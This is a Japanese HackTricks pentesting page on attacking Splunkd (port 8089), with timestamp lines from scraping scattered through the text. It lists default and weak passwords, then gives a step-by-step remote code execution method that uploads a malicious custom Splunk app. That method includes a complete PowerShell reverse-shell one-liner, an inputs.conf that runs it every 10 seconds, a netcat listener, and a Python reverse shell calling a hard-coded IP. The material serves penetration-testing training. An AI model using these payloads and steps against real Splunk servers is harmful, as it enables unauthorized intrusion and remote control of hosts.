2023-07-07 23:42:27 +00:00
# 8089 - Splunkdのペンテスト
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 12:54:39 +00:00
< summary > < strong > **htARTE( HackTricks AWS Red Team Expert) **< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > **htARTE( HackTricks AWS Red Team Expert) **< / strong > < / a > < strong > を通じて、ゼロからヒーローまでAWSハッキングを学ぶ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-09 12:54:39 +00:00
HackTricksをサポートする他の方法:
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASS& HackTricksスワッグ** ](https://peass.creator-spring.com )を入手する
- [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )で**フォロー**する。
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
2022-04-28 16:01:33 +00:00
2022-10-03 00:11:21 +00:00
< / details >
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
## **基本情報**
2022-04-28 16:01:33 +00:00
2024-02-09 12:54:39 +00:00
Splunkは**ログ分析ツール**であり、**データの収集、分析、可視化**において重要な役割を果たします。最初の目的は**SIEM( セキュリティ情報およびイベント管理) **ツールとしてではなかったが、**セキュリティ監視**や**ビジネス分析**の領域で人気を博しています。
2020-11-06 00:32:50 +00:00
2024-02-09 12:54:39 +00:00
Splunkの展開はしばしば**機密データ**の保存に利用され、システムを侵害することに成功すれば、潜在的な攻撃者にとって**貴重な情報源**となり得ます。
2023-07-07 23:42:27 +00:00
**デフォルトポート:** 8089
2021-10-18 11:21:18 +00:00
```
2020-11-06 00:32:50 +00:00
PORT STATE SERVICE VERSION
8089/tcp open http Splunkd httpd
```
2022-10-03 00:11:21 +00:00
{% hint style="info" %}
2024-02-09 12:54:39 +00:00
**Splunkウェブサーバーはデフォルトでポート8000で実行**されます。
2022-10-03 00:11:21 +00:00
{% endhint %}
2020-11-06 00:32:50 +00:00
2023-07-07 23:42:27 +00:00
## 列挙
2022-10-03 00:11:21 +00:00
2023-07-07 23:42:27 +00:00
### 無料版
2022-10-03 00:11:21 +00:00
2024-02-09 12:54:39 +00:00
Splunk Enterpriseトライアルは**60日後に無料版に変換**され、**認証が不要**です。システム管理者がSplunkのトライアルをインストールして試すことは一般的であり、**その後忘れ去られる**ことがあります。これにより、認証のない無料版に自動的に変換され、環境にセキュリティホールが導入されます。予算の制約により一部の組織が無料版を選択することがあり、ユーザー/ロール管理の重要性を十分に理解していない可能性があります。
2022-10-03 00:11:21 +00:00
2023-07-07 23:42:27 +00:00
### デフォルトの資格情報
2022-10-03 00:11:21 +00:00
2024-02-09 12:54:39 +00:00
古いバージョンのSplunkでは、デフォルトの資格情報は**`admin:changeme`**であり、ログインページに便利に表示されています。\
しかし、**最新バージョンのSplunk**では、**インストールプロセス中に資格情報が設定**されます。デフォルトの資格情報が機能しない場合は、`admin`、`Welcome`、`Welcome1`、`Password123`などの一般的な弱いパスワードをチェックする価値があります。
2022-10-03 00:11:21 +00:00
2023-07-07 23:42:27 +00:00
### 情報の取得
2022-10-03 00:11:21 +00:00
2024-02-09 12:54:39 +00:00
Splunkにログインすると、**データを閲覧**したり、**レポートを実行**したり、**ダッシュボードを作成**したり、Splunkbaseライブラリから**アプリケーションをインストール**したり、カスタムアプリケーションをインストールしたりできます。\
コードも実行できます: Splunkには、サーバーサイドのDjangoアプリケーション、RESTエンドポイント、スクリプト入力、アラートスクリプトなど、**コードを実行するための複数の方法**があります。Splunkサーバーでリモートコード実行を行う一般的な方法は、スクリプト入力を使用することです。
2022-10-03 00:11:21 +00:00
2024-02-09 12:54:39 +00:00
また、SplunkはWindowsまたはLinuxホストにインストールできるため、Bash、PowerShell、またはBatchスクリプトを実行するためのスクリプト入力を作成できます。
2020-11-06 00:32:50 +00:00
2022-05-01 13:25:53 +00:00
### Shodan
2020-11-06 00:32:50 +00:00
2023-07-07 23:42:27 +00:00
* `Splunkビルド`
2022-04-28 16:01:33 +00:00
2022-10-03 00:11:21 +00:00
## RCE
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
### カスタムアプリケーションの作成
2022-10-03 00:11:21 +00:00
2024-02-09 12:54:39 +00:00
カスタムアプリケーションは**Python、Batch、Bash、またはPowerShellスクリプトを実行**できます。\
**SplunkにはPythonがインストールされている**ことに注意してください。そのため、**Windows**システムでもPythonコードを実行できます。
2022-04-28 16:01:33 +00:00
2024-02-09 12:54:39 +00:00
[**こちら** ](https://github.com/0xjpuff/reverse\_shell\_splunk )のSplunkパッケージを使用して、手助けを受けることができます。このリポジトリの**`bin`**ディレクトリには、[Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py)と[PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1)の例があります。これをステップバイステップで進めていきましょう。
2022-10-03 00:11:21 +00:00
2024-02-09 12:54:39 +00:00
これを達成するためには、以下のディレクトリ構造を使用してカスタムSplunkアプリケーションを作成する必要があります:
2022-10-03 00:11:21 +00:00
```shell-session
tree splunk_shell/
splunk_shell/
├── bin
└── default
```
2024-02-09 12:54:39 +00:00
**`bin`**ディレクトリには、実行するスクリプト(この場合は**PowerShell**リバースシェル)が含まれ、デフォルトディレクトリには`inputs.conf`ファイルがあります。リバースシェルは**PowerShellのワンライナー**になります:
2022-10-03 00:11:21 +00:00
```powershell
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>& 1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(
```
2024-02-09 12:54:39 +00:00
The [inputs.conf ](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf )ファイルは、Splunkに**どのスクリプトを実行するか**とその他の条件を伝えます。ここでは、アプリを有効に設定し、Splunkにスクリプトを10秒ごとに実行するよう指示しています。インターバルは常に秒単位であり、この設定が存在する場合にのみ、入力( スクリプト) が実行されます。
2022-10-03 00:11:21 +00:00
```shell-session
2023-07-07 23:42:27 +00:00
cat inputs.conf
2022-10-03 00:11:21 +00:00
[script://./bin/rev.py]
2023-07-07 23:42:27 +00:00
disabled = 0
interval = 10
sourcetype = shell
2022-10-03 00:11:21 +00:00
[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
```
2024-02-09 12:54:39 +00:00
次に、アプリケーションが展開されるときに実行され、PowerShellのワンライナーを実行する`.bat`ファイルが必要です。
2022-10-03 00:11:21 +00:00
2023-07-07 23:42:27 +00:00
次のステップは、`Install app from file`を選択し、アプリケーションをアップロードすることです。
2022-10-03 00:11:21 +00:00
2022-12-25 19:08:07 +00:00
< figure > < img src = "../.gitbook/assets/image (4) (5) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-10-03 00:11:21 +00:00
2023-07-07 23:42:27 +00:00
悪意のあるカスタムアプリをアップロードする前に、Netcatまたは[socat](https://linux.die.net/man/1/socat)を使用してリスナーを開始しましょう。
2022-10-03 00:11:21 +00:00
```shell-session
sudo nc -lnvp 443
listening on [any] 443 ...
```
2024-02-09 12:54:39 +00:00
### Upload app ページで、`Browse` をクリックし、先に作成した tarball を選択して `Upload` をクリックします。**アプリケーションをアップロードするとすぐに**、アプリケーションのステータスが自動的に `Enabled` に切り替わり、**逆シェルが受信されます**。
2022-10-03 00:11:21 +00:00
#### Linux
2024-02-09 12:54:39 +00:00
**Linux ホスト**を扱っている場合、カスタムの悪意のあるアプリを作成して tarball をアップロードする前に、**`rev.py` Python スクリプトを編集する必要があります**。プロセスの残りの部分は同じであり、Netcat リスナーで逆シェル接続を取得し、問題なく進行します。
2022-10-03 00:11:21 +00:00
```python
import sys,socket,os,pty
ip="10.10.14.15"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
```
2023-07-07 23:42:27 +00:00
### RCE & 特権昇格
2022-10-03 00:11:21 +00:00
2024-02-09 12:54:39 +00:00
以下のページでは、このサービスがどのように悪用されて特権昇格や持続性の獲得に利用されるかについて説明があります:
2022-10-03 00:11:21 +00:00
{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}
[splunk-lpe-and-persistence.md ](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md )
{% endcontent-ref %}
2023-07-07 23:42:27 +00:00
## 参考文献
2022-10-03 00:11:21 +00:00
* [https://academy.hackthebox.com/module/113/section/1213 ](https://academy.hackthebox.com/module/113/section/1213 )
< details >
2024-02-09 12:54:39 +00:00
< summary > < strong > ゼロからヒーローまでのAWSハッキングを学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
HackTricks をサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-02-09 12:54:39 +00:00
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop ) をチェックしてください!
* [**公式PEASS & HackTricksのグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ) を発見し、独占的な [**NFTs** ](https://opensea.io/collection/the-peass-family ) のコレクションを見つける
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f ) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live ) をフォローする。**
* **ハッキングテクニックを共有するために、** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) と [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) のGitHubリポジトリにPRを提出する。
2022-04-28 16:01:33 +00:00
< / details >